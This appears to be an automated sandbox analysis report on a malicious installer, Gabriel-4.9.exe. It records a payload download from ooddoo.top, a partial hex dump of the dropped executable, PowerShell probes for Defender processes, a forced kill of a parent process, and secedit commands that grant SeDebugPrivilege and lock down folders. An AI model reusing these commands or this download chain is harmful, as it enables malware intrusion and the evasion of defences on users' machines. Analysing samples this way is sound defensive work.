2024-12-29 03:24:29 UTC	139	OUT	GET /abc/47.exe HTTP/1.1 Accept: / User-Agent: Setup Factory 9.0 Connection: Keep-Alive Cache-Control: no-cache Host: ooddoo.top
2024-12-29 03:24:29 UTC	901	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 03:24:29 GMT Content-Type: application/octet-stream Content-Length: 2633392 Connection: close Last-Modified: Sun, 29 Dec 2024 02:39:00 GMT Accept-Ranges: bytes ETag: "bb8d3ed19a59db1:0" Age: 7 Cache-Control: max-age=14400 cf-cache-status: HIT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pl50TCjlNkJSaibokLul7RtcBd5rBaafozJ2n7DYxmEWXDOVMprYDYOzhOK3hAu%2FBq7SLAkUIqwwgY6xPWYy6LHFiB9iJtHhEFGbivgTKQoRF%2BXUFbmgQ16cxGhY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f96ad6cf908c326-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1514&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=753&delivery_rate=1830721&cwnd=240&unsent_bytes=0&cid=c5f9743687943cfa&ts=457&x=0"
2024-12-29 03:24:29 UTC	468	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY\|zuYzuYwzuRich{u
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 4c cb 01 00 00 10 00 00 00 04 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 a0 d1 00 00 00 e0 01 00 00 62 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 68 1c 00 00 00 c0 02 00 00 04 00 00 00 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 5d 12 03 00 00 e0 02 00 00 da 00 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 2c 1b 00 00 00 00 06 00 00 18 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 Data Ascii: L ` b@@ hj@ ]n@@ ,H@B.id
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 26 84 e7 47 62 34 f8 97 fd d3 72 13 ce c6 b3 88 1f b4 f6 ee 95 d0 fb c4 4a 19 2c 94 44 88 5d 27 37 fe 7d 76 61 45 f0 5e ff f4 e4 0c 1f 95 d5 58 06 bd ec 3b 14 36 e8 aa 7e 34 d5 b8 8c 4e 20 f9 1f be 5d 8c 76 1b 9a a9 44 ba 1a 46 0c 22 6a f4 ff a7 32 17 96 42 e5 78 76 19 ab 90 21 61 08 60 92 c6 fd 2c 5b 46 8a bc ad c1 a4 26 82 cb 9c 79 62 29 6a c6 fc 4e 6c e9 fe 92 c1 b1 f8 05 dc 68 f1 01 1c 8b 3a 5e 18 36 6a de 77 ac a1 d0 0f 4a 5a 4a f7 4d 8c 11 5e 3d cf 01 92 4c 92 4c 4a dc 6a 84 bf ec 55 1d 9b b0 0a 9e d2 56 10 22 18 55 14 d9 61 4c 7c 4e 98 8f 58 dd 7e 23 ea c6 42 2b a1 43 a9 bd ec 1b a1 60 5c 7c 78 50 e5 04 c1 01 10 12 ed 3a 1e ad e7 7d f4 de da 7e 86 3b 58 a3 b9 61 57 c5 49 a9 d1 31 bc c2 32 87 5b f2 83 4e ae 70 f9 aa 67 44 60 44 78 40 de 61 10 b7 85 Data Ascii: &Gb4rJ,D]'7}vaE^X;6~4N ]vDF"j2Bxv!a`,[F&yb)jNlh:^6jwJZJM^=LLJjUV"UaL\|NX~#B+C`\\|xP:}~;XaWI12[NpgD`Dx@a
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 02 0f 60 e1 81 0c b4 a8 6e a6 a4 15 80 b6 64 d4 30 87 ee f5 c6 df 43 d9 02 bd 34 6a f2 c7 27 c9 ca df 5c ca ed 85 ce 6f f1 4a 6a 43 90 ba 79 16 e6 ca e2 f1 9f 18 b4 70 dd 41 4c 7b 44 23 14 28 d4 fc cd 56 83 2c 73 7d 4a cc d1 33 ca 6c 6a da ac fe bd 07 5d d9 ea e7 67 a3 7b ec 00 4c e6 af af e6 14 63 76 cc 41 05 3f c4 ac ec 56 73 85 3c 3c ae 3f 08 a6 00 2c f1 3d 85 e1 60 46 11 95 51 df 45 b7 3d 18 c0 a1 47 d6 e5 4d 44 30 82 56 54 40 5e db e2 05 ba 0e 7f d6 e4 22 1b 3e 89 27 a2 48 7c d5 25 c6 d3 cb 56 d0 74 80 da c7 5c 57 3e e6 0c b5 8d 6e e4 42 52 de 73 48 9a 48 61 85 4e da 61 fd 7d 4b 7b 73 b4 0a 90 b4 82 3f 54 6f fd 68 9a 60 d5 45 3c 76 68 c1 cc bc 61 59 05 80 63 3e 53 0c 8e e6 64 1d 7d 06 72 87 ff 2b 74 f0 7e 2b 3a 0c 5c d6 9d be 67 4c 2c 5e d2 a9 ae 67 Data Ascii: `nd0C4j'\oJjCypAL{D#(V,s}J3lj]g{LcvA?Vs<<?,=`FQE=GMD0VT@^">'H\|%Vt\W>nBRsHHaNa}K{s?Toh`E<vhaYc>Sd}r+t~+:\gL,^g
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 8d 24 3d b2 1e a8 6c 75 2b e1 85 19 69 14 d5 26 82 bd f0 4b a3 65 6d 8c ee ea d3 ee d5 15 6e 54 04 1f 81 c4 5d 18 50 2a a1 a1 bf 4b 6b 0b 8a 7d 0a 90 96 2d 81 b1 67 92 da 5b 72 14 3c d8 6f 00 f3 e4 0a b2 89 a7 e7 1a e7 7a 11 03 dc ad ec 8b 3c e0 f5 d1 80 c4 e2 c5 f4 da f6 dc 76 62 5e c1 e5 a5 51 c2 b5 68 37 f8 7e 6a 0e 23 e9 71 77 e2 e6 08 73 12 e1 17 ce 75 cc 07 a0 45 e8 e4 da 15 35 de bc 00 f2 7f 69 43 f2 36 8f 09 9e 68 25 1e 86 1a 52 be e3 e9 b2 7a 44 81 9e 38 34 6b 87 39 69 14 de d4 87 d5 6e 2d b7 4a f3 ca 97 e1 a2 ee 8a 87 12 c1 80 9a e8 5d 3f 44 e0 c7 61 32 72 b9 53 97 41 4e af 8c b6 53 2f 67 b2 c0 3a 4f 61 d0 cc 27 5b e9 19 96 cd 17 10 10 5f 2d 34 24 41 00 b4 4e 0e 61 3f 57 01 d8 36 35 ea 9e 6c f4 e2 40 64 2b c2 e2 5f 85 52 c7 3f a6 44 d6 72 0a 32 Data Ascii: $=lu+i&KemnT]P*Kk}-g[r<oz<vb^Qh7~j#qwsuE5iC6h%RzD84k9in-J]?Da2rSANS/g:Oa'[_-4$ANa?W65l@d+_R?Dr2
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 81 6d a2 97 49 b7 1d 1b 97 fe a4 f1 49 b6 7c 70 15 11 ec ea fa 3e 0a e3 53 1c 83 02 80 5c 25 8d a7 e0 60 e4 d6 61 9e 96 3e 52 37 e4 39 69 2d c8 a0 7c a0 9d db a7 db e7 e8 96 b6 06 e9 f2 c2 17 da 00 2b a4 33 36 47 86 7e 55 37 0d 7a fe a6 7a f7 58 dd 92 00 a7 0d a5 88 46 ac e8 56 bb cc 6a bd 85 4d e5 6f 6b bc 57 6c 9e a2 5f 57 09 25 c8 ec 44 b9 e3 12 5c 31 cb dd 92 22 ca 4f 2a 42 71 91 a4 f0 64 5d 6e fe c9 53 d7 2d a1 be 51 1d dc 7d b0 32 88 5d fc d1 11 f8 86 6e d2 9f 6d 0a bf 63 70 30 c8 5f 9c 9d 60 dc 57 0a ca 7c 15 d2 a6 a0 a8 d6 f3 f0 ae 94 b2 aa b1 f2 e4 8c 29 5b 64 28 42 87 14 bb 7f 7b 50 1c ba 87 31 05 ae 90 ed 19 ad c6 d5 f7 95 c8 9b 49 59 c6 cd 4a 92 8d f0 1b 4b 1b 2c d7 b3 8a af 5f 59 eb 23 9a 3a 0d c5 6f 35 26 62 f3 d3 62 17 4d 37 17 90 b8 23 0e Data Ascii: mII\|p>S\%`a>R79i-\|+36G~U7zzXFVjMokWl_W%D\1"O*Bqd]nS-Q}2]nmcp0_`W\|)[d(B{P1IYJK,_Y#:o5&bbM7#
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 44 05 a7 31 26 04 40 a2 7c 77 67 07 72 01 f2 6e 7b ac 72 e4 2a d9 c0 70 9e 28 10 ad 56 36 bc b9 c9 28 0d 39 28 65 ae 9e 7e a6 77 65 a3 e9 d7 7b 68 6a d3 09 0e 60 2d 0b 4a c2 35 87 6b 7a b2 6f fa 35 64 ed 8c 4e eb 5f 2f 43 57 18 2a 41 e4 29 0e 19 f1 6c 20 cb fe e4 9b 45 ad 87 96 89 71 24 9a e4 24 88 a2 c7 ba 84 f0 c8 98 51 52 90 7d 60 a7 19 3a b9 3b ee c7 be e5 07 88 e8 16 39 98 57 6e 94 a3 95 16 8d 84 06 36 c1 a3 24 9f 66 d1 f1 3f f7 58 4c a7 2e 43 d8 ba 43 db 3a ff 13 79 6d 85 1e 74 0a 39 c2 76 26 2d cb d0 34 42 c2 70 e4 a7 1e a5 ee 0f 4a bf 2e e0 0b 80 3e 5a 11 58 6c 76 ba b2 63 96 d7 ed 29 3a a4 a2 04 4f 81 f3 35 47 89 40 72 ff ee 94 09 56 16 ac 63 f1 32 6c 21 2b 35 33 70 29 f2 4a 77 d1 d4 9a 68 e0 34 8d f2 eb 26 79 41 8a 7a f0 79 7b 7a a8 3a cb 14 4c Data Ascii: D1&@\|wgrn{rp(V6(9(e~we{hj`-J5kzo5dN_/CWA)l Eq$$QR}`:;9Wn6$f?XL.CC:ymt9v&-4BpJ.>ZXlvc):O5G@rVc2l!+53p)Jwh4&yAzy{z:L
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 15 69 aa 67 4d c9 6a 5b 3d bb 82 b8 90 1a c9 14 ee be a0 e9 1c a2 a4 39 06 ae 24 2a db f2 26 09 97 50 4b 47 59 ff 7c 76 3f 61 75 f3 36 ab 15 3e cd 51 9c c5 bf b5 34 88 6c 61 62 f4 41 f8 cb 9a cb 45 64 8a 7e 9b 78 87 d0 ac e9 23 bd 81 2c 7e ad 4e 75 62 0a e4 78 9d 22 bb f3 86 21 2c 48 bd 3b 2b ef 97 71 78 08 66 cc e5 79 6a 3b 95 e4 9a 67 3a e5 7f 23 e8 4d 19 db 81 64 e2 3a 6b 9e 72 5f 53 48 11 c3 bc 35 7d 90 a2 8c f8 fc 1b ac 25 00 0c 67 01 79 29 5d 54 58 2b 38 3e 22 3f 3c 2a 2a b4 5d 6e f3 3f c3 6e ae 51 c4 12 7b e8 38 66 bb 56 4f 87 dc 65 ac 50 64 d9 2c a4 da b1 04 13 d6 06 88 2e d7 ac 57 82 2a 5c 1b 15 c5 cd 4c 67 a6 c4 6b 50 60 f0 3c 81 8b 91 5d 4b 2c e9 a8 c5 03 93 59 82 9b 7c 76 1f 5f 9a a7 5f 0e 90 72 75 4b 6c e5 48 2f 23 7e 39 bc 33 61 52 f2 22 f8 Data Ascii: igMj[=9$&PKGY\|v?au6>Q4labAEd~x#,~Nubx"!,H;+qxfyj;g:#Md:kr_SH5}%gy)]TX+8>"?<]n?nQ{8fVOePd,.W\LgkP`<]K,Y\|v__ruKlH/#~93aR"
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: 85 61 3f 31 fb 14 5a 23 90 14 be 9d c8 8f 27 44 74 64 f0 f7 02 74 7c 1b e8 50 24 19 71 5f 6b 01 8b ab 3d 01 94 42 69 aa 34 93 4c 75 7f 2e 22 e8 5a 29 80 cc 2c a9 dd 02 e5 80 04 db f1 dc 8e 59 8c 61 6d cd ea cd e9 c2 e3 c8 28 01 cb f8 42 35 96 ce f2 eb 95 aa 40 04 bc 2a 64 fe 5d be 8d ce 4d 2f 9e c8 e3 e3 2b c8 64 2d 6a 37 8d 8c 05 d9 30 65 a5 79 b5 1c 53 36 6b e4 ed c4 91 4d fa 41 92 a4 1a 07 ed b2 37 65 d5 da 7f 64 2d de 02 e6 3b 3e bf 3d d9 f7 c0 ba 82 be da a1 30 8b e5 31 79 60 41 24 b4 69 75 0a ec 25 81 df 08 5b f6 8d 6f 3a 99 65 a9 6c 55 db 05 ac c9 97 14 7e e2 8b 32 32 ca 6a 14 7d 2c 1f 73 3f dc bf 5c dc 44 48 44 bd 6a 8f 45 38 ce 36 2f 6b 84 2d 1a c2 25 49 a4 14 0d 2a cc 5d 78 55 0d c5 67 10 e1 27 5d 19 ad af 6f 5f ec 2f 46 ee e1 c3 bc 6b 79 4a 69 Data Ascii: a?1Z#'Dtdt\|P$q_k=Bi4Lu."Z),Yam(B5@d]M/+d-j70eyS6kMA7ed-;>=01y`A$iu%[o:elU~22j},s?\DHDjE86/k-%I]xUg']o_/FkyJi
2024-12-29 03:24:29 UTC	1369	IN	Data Raw: fc 5f 24 95 99 6e 8e 66 4b 8a 9b 2e 28 9e 0a 79 96 42 9e 29 e3 4b 19 f3 b9 91 57 2a 50 f6 8a 18 bc 39 f0 82 05 b8 04 67 45 2a 1b 43 33 de 02 a3 b0 62 a3 d3 5e a4 ec ab 39 6c 49 f5 d3 cd c1 78 7a 82 4e cc 14 a3 fa 5b b8 fa 0c f6 fb 42 e3 82 85 9a 18 3f 80 57 4d 9d fa 57 f2 1d f9 52 cc 59 59 70 4e 92 de 83 ac 2f 10 65 31 5d cb 16 9e 87 11 2d 0a a3 3a 0b 45 57 77 ef ce 44 10 16 c1 4e 7b 59 04 59 2f df cb ee e1 bf e1 e8 3e e3 fb c7 5d df 55 0f 3d 62 c0 1c c6 0a a2 14 29 f8 ce e6 dd 87 2d e7 f4 48 5d 4c 17 4d 0e a4 bb 29 4c 6f 4f be 1e a2 d0 da ff a9 26 c5 46 5c 07 8a a1 6a 56 0b c6 7a bc 40 00 56 70 2b 94 2d 0b 18 39 a9 b6 ca b6 12 97 11 13 a3 5f 26 1d 26 d0 d3 1b 23 25 0c 2b fb 98 0b 29 b1 58 fd 32 b7 7c 42 76 77 f9 e3 0b d0 60 77 70 b2 97 25 07 ec 7f 64 70 Data Ascii: _$nfK.(yB)KWP9gEC3b^9lIxzN[B?WMWRYYpN/e1]-:EWwDN{YY/>]U=b)-H]LM)LoO&F\jVz@Vp+-9_&&#%+)X2\|Bvw`wp%dp

Target ID:	0
Start time:	22:23:59
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\Gabriel-4.9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Gabriel-4.9.exe"
Imagebase:	0x7ff746500000
File size:	21'068'715 bytes
MD5 hash:	DB868A34EDC41156E9AEED55EA44BA97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:24:00
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5572466 "__IRAFN:C:\Users\user\Desktop\Gabriel-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Imagebase:	0x7ff7a0900000
File size:	5'153'280 bytes
MD5 hash:	2A7D5F8D3FB4AB753B226FD88D31453B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	22:24:06
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:24:06
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:24:06
Start date:	28/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:	0x7ff6e13b0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:24:09
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:24:09
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:24:10
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:24:10
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:24:11
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:24:11
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:24:12
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:24:12
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:24:33
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"
Imagebase:	0x7ff652340000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:24:33
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:24:33
Start date:	28/12/2024
Path:	C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"
Imagebase:	0x1e0000
File size:	2'633'392 bytes
MD5 hash:	22AF53F40D27C913642C0572C73A5D87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:24:34
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:24:34
